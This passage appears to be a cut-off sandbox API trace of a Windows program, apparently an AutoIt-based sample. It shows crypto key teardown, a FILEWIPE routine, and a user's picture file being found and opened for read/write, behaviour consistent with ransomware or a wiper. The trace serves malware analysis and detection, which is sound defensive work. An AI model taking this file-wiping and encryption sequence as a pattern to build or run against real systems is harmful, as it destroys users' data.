hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.612] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.612] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.612] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.613] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.616] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.620] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.620] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.620] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.620] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.620] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.620] CryptDestroyKey (hKey=0x90af98) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.621] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.621] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.621] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.621] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.621] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.621] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.622] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.622] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.622] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.622] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.623] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.623] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.623] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.623] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0190.623] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0190.623] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.623] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.623] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.625] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.625] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0190.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0x90af58 [0190.627] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0190.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.627] CharLowerBuffW (in: lpsz="byte[34455]", cchLength=0xb | out: lpsz="byte[34455]") returned 0xb [0190.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.628] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.628] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.628] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.628] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.628] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.631] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.632] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\qmjeo8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0190.632] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 